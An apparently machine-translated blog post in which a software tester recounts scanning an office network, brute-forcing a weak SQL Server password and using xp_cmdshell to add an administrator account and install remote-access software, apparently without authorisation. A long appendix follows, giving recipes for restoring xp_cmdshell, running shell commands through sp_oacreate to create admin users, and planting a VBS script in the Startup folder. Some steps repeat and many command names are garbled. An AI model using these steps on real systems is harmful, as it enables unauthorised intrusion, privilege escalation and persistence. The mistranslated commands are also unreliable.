Recording an unintentional intrusion Test

Last year, I worked in a library management software company. TestBecause the company's software is relatively mature, the main task is Function TestingInstallation and uninstallation testing, compatibility testing, and Performance TestingSoftware Security is rarely tested.

One day, I thought about whether the software was so insurmountable? Never doSecurity TestingAnd then make up your mind to test it once.

The company's software is a C/S system, connected to the sqlserver database. The SQL Server database has vulnerabilities. This is why I started with SQL Server.

First I scanned the LAN Using the X-Scan-v3.3-cn (my system administrator was not alert enough, I scanned for an hour he did not find), found that there are several computers are username administrator password is empty, however, this is not my goal and can be ignored for the moment. At the same time, we can see some information about the target host. If port 80 is disabled, it may be that there is no Internet connection, and there is a port such as port 135, which is not used either, the most important piece of information shows that the sqlserver connection username is abbreviated to the original company pinyin, And the password is displayed as a weak password. Now I am confident that I am using a simple brute force cracking software, the password is cracked.

Ah, this was cracked so quickly.DatabaseAnd I didn't think of it. I used to think that this system is really hard to crack!

Now that we are in, let's continue. Remember that sqlserver has a very dangerous Stored Procedure xp_mongoshell. I don't know if the developer has handled it. I wrote exec sp_addextendedproc xp_mongoshell 'net user ', the execution was successful, showing all the users on the target host. Now I am completely speechless. Then I directly used the Stored Procedure xp_mongoshell to create a user with equivalent administrator permissions, and installed DameWare on this host. Then I wanted the project manager to appreciate the vulnerability.

　　Appendix: some simple use of xp_cmdshell (OthersUser Experience)

Enable external shellSQLStatement

Exec sp_addextendedproc xp_cmdshell, @ dllname = 'loglog70. dll'

Determine whether the storage extension exists

Select count (*) from Master. DBO. sysobjects where xtype = 'X' and name = 'xp _ cmdshell'

If the returned result is 1, OK is returned.

Restore xp_mongoshell

Exec master. DBO. addextendedproc 'xp _ Your shell', 'xp log70. dll '; select count (*) from master. DBO. sysobjects where xtype = 'X' and name = 'xp _ Your shell'

If the returned result is 1, OK is returned.

Otherwise, upload xplog7.0.dll.

Exec master. DBO. addextendedproc 'xp _ mongoshell', 'c: \ winnt \ system32 \ xplog70.dll'

After the weak SQL password is scanned, the stored procedure 'master .. xp_mongoshell' cannot be found using sqltools'

The main cause of this situation is that the Extended Stored Procedure xp_mongoshell is deleted, and there is a recovery method. If it fails, it means it is renamed.

Use sqltools to connect. After the connection, execute the database command in the directory and execute:

Exec sp_addextendedproc xp_cmdshell, @ dllname = 'loglog70. dll'

If you are lucky enough, you will succeed. If you want your zombie to fail to execute the DOS command using SQL, execute:

Sp_dropextendedproc "xp_cmdshell"

You can't execute the doscommand. Of course, you can use the above statement to restore it.

You can use sqltools to connect successfully and execute the doscommand, but it always shows that the execute permission on the object 'xp _ mongoshell' (Database 'master', owner 'dbo') is denied.

How can this problem be solved ????

Not even uploading files ......

1. The Stored Procedure 'master .. xpcmdshell' cannot be found '.

Recovery Method: After querying the separator connection,

Step 1: Execute exec sp_addextendedproc xp_cmdshell, @ dllname = 'xplog70. dll 'declare @ o int

Step 2: Execute sp_addextendedproc 'xp _ cmdshell', 'sql70. dll'

Then press F5 to complete the command execution.

2. Unable to load DLL xpsql70.dll or a DLL referenced by the DLL. Cause 126 (the specified module cannot be found .)

Recovery Method: After querying the separator connection,

Step 1: Execute exec sp_addextendedproc xp_cmdshell, @ dllname = 'xplog70. dll 'declare @ o int

Step 2: Execute sp_addextendedproc 'xp _ cmdshell', 'sql70. dll'

Then press F5 to complete the command execution.

3. The xp_cmdshell function cannot be found in web70.dll. Cause: 127 (the specified program cannot be found .)

Recovery Method: After querying the separator connection

Step 1: Execute exec sp_dropextendedproc 'xp _ export shell'

Step 2: Execute exec sp_addextendedproc 'xp _ cmdshell', 'xpweb70. dll'

Then press F5 to complete the command execution.

4. Ultimate method:

If none of the above methods can be recovered, try the following method to add an account:

After querying the separator connection,

2000servser system:

Declare @ shell int exec sp_oacreate 'wscript. shell', @ shell output

Exec sp_oamethod @ shell, 'run', null, 'c: \ winnt \ system32 \ cmd.exe/C net user New User Password/add'

Declare @ shell int exec sp_oacreate 'wscript. shell', @ shell output exec sp_oamethod

@ Shell, 'run', null, 'c: \ winnt \ system32 \ cmd.exe/C net localgroup administrators new user/add'

XP or 2003server system:

Declare @ shell int exec sp_oacreate 'wscript. shell', @ shell output exec sp_oamethod

@ Shell, 'run', null, 'c: \ windows \ system32 \ cmd.exe/C net user New User Password/add'

Declare @ shell int exec sp_oacreate 'wscript. shell', @ shell output exec sp_oamethod

@ Shell, 'run', null, 'c: \ windows \ system32 \ cmd.exe/C net localgroup administrators new user/add'

No way ......

　　Method 1: query the separator connection and execute:

If exists (select * from

DBO. sysobjects where id = object_id (n' [DBO]. [xp_mongoshell] ') and

Objectproperty (ID, n' isextendedproc') = 1)

Exec sp_dropextendedproc n '[DBO]. [xp_cmdshell]'

Go

Then press F5 to complete the command execution.

　　Method 2: Query after separator connection

Step 1: use master

Step 2: Execute sp_dropextendedproc 'xp _ cmdshell' and press F5 to complete the execution.

1. The Stored Procedure 'master .. xpcmdshell' cannot be found. Restoration Method: After querying the separator connection,

Step 1: Execute exec sp_addextendedproc xp_cmdshell, @ dllname = 'xplog70. dll 'declare @ o int

Step 2: Execute sp_addextendedproc 'xp _ cmdshell', 'sql70. dll ', and press F5 to complete the command execution.

2. Unable to load DLL xpsql70.dll or a DLL referenced by the DLL. Cause 126 (the specified module cannot be found .)

Recovery Method: After querying the separator connection,

Step 1: Execute sp_dropextendedproc "xp_cmdshell"

Step 2: Execute sp_addextendedproc 'xp _ cmdshell', 'sql70. dll ', and press F5 to complete the command execution.

3. The xp_cmdshell function cannot be found in web70.dll. Cause: 127 (the specified program cannot be found .)

Recovery Method: After querying the separator connection,

Step 1: Execute exec sp_dropextendedproc 'xp _ export shell'

Step 2: Execute exec sp_addextendedproc 'xp _ cmdshell', 'xpweb70. dll'

Then press F5 to complete the command execution.

4. Ultimate method. If none of the above methods can be recovered, try the following method to add an account:

After querying the separator connection,

2000servser system:

Declare @ shell int exec sp_oacreate 'wscript. shell ', @ shell output exec sp_oamethod @ shell, 'run', null, 'c: \ winnt \ system32 \ cmd.exe/C net user yszar andylau/add'

Declare @ shell int exec sp_oacreate 'wscript. shell ', @ shell output exec sp_oamethod @ shell, 'run', null, 'c: \ winnt \ system32 \ cmd.exe/C net localgroup administrators yszar/add'

XP or 2003server system:

Declare @ shell int exec sp_oacreate 'wscript. shell ', @ shell output exec sp_oamethod @ shell, 'run', null, 'c: \ windows \ system32 \ cmd.exe/C net user username and password/add'

Declare @ shell int exec sp_oacreate 'wscript. shell ', @ shell output exec sp_oamethod @ shell, 'run', null, 'c: \ windows \ system32 \ cmd.exe/C net localgroup administrators username/add'

Or you can

Declare @ o int

Exec sp_oacreate 'wscript. shell', @ o out

Exec sp_oamethod @ o, 'run', null, 'xxxxx' \ XXXXX command to be executed for you

Sometimes the storage process sp_addextendedproc cannot be found when the query separator is used to connect and execute the preceding statements.

Solution:

Create procedure sp_addextendedproc --- 1996/08/30 20:13

@ Functname nvarchar (517),/* (owner.) Name of function to call */

@ Dllname varchar (255)/* Name of DLL containing function */

As

Set implicit_transactions off

If @ trancount> 0

Begin

Raiserror (15002,-1,-1, 'SP _ addextendedproc ')

Return (1)

End

DBCC addextendedproc (@ functname, @ dllname)

Return (0) -- sp_addextendedproc

Go

Paste this code into the query splitter and execute it.

1. Break Through xplog70.dll

Declare @ cmd int

Exec sp_oacreate 'wscript. shell', @ cmd output

Exec sp_oamethod @ cmd, 'run', null, 'net user name and password/add', '0', 'true'

Declare @ cmd int

Exec sp_oacreate 'wscript. shell', @ cmd output

Exec sp_oamethod @ cmd, 'run', null, 'net localgroup administrators username/add', '0', 'true'

2. Restore xp_mongoshell

First try to restore xp_mongoshell, sp_addextendedproc 'xp _ mongoshell', 'xpsql70. dll ',

It is found that xpsql70.dll is deleted.

Then write the vbs file to the Startup Group:

Declare @ o int, @ F int, @ t int, @ RET int, @ A int

Exec sp_oacreate 'scripting. FileSystemObject ', @ o out

Exec sp_oamethod @ o, 'createtextfile', @ F out,

'C: \ release E ~ 1 \ alluse ~ 1 \ Start Menu \ Program \ Start http://www.cnblogs.com/junzhongxu/admin/file://a.vbs'/, 1

Exec @ ret = sp_oamethod @ F, 'writeline ', null,

'Set wshshell = Createobject ("wscript. Shell ")'

Exec @ ret = sp_oamethod @ F, 'writeline ', null,

'A = wshshell. Run ("cmd.exe/C net user Lintao lintao520/Add", 0 )'

Exec @ ret = sp_oamethod @ F, 'writeline ', null,

'B = wshshell. Run ("cmd.exe/C net localgroup administrators Lintao/Add", 0 )'

3. Remove the xp_cmdshell permission of SA.

If you do not need to extend the Stored Procedure xp_mongoshell, remove it. Use this SQL statement:

Use master

Sp_dropextendedproc 'xp _ export shell'

Xp_mongoshell is the best way to enter the operating system and a large backdoor left by the database to the operating system. If you need this stored procedure, use this statement to restore it.

Sp_addextendedproc 'xp _ external shell', 'sqlsql70. dll'

4. Upload xplog7.0.dll:

Exec master. DBO. addextendedproc 'xp _ mongoshell', 'c: \ winnt \ system32 \ xplog70.dll'

From: http://www.51testing.com/html/03/n-132103.html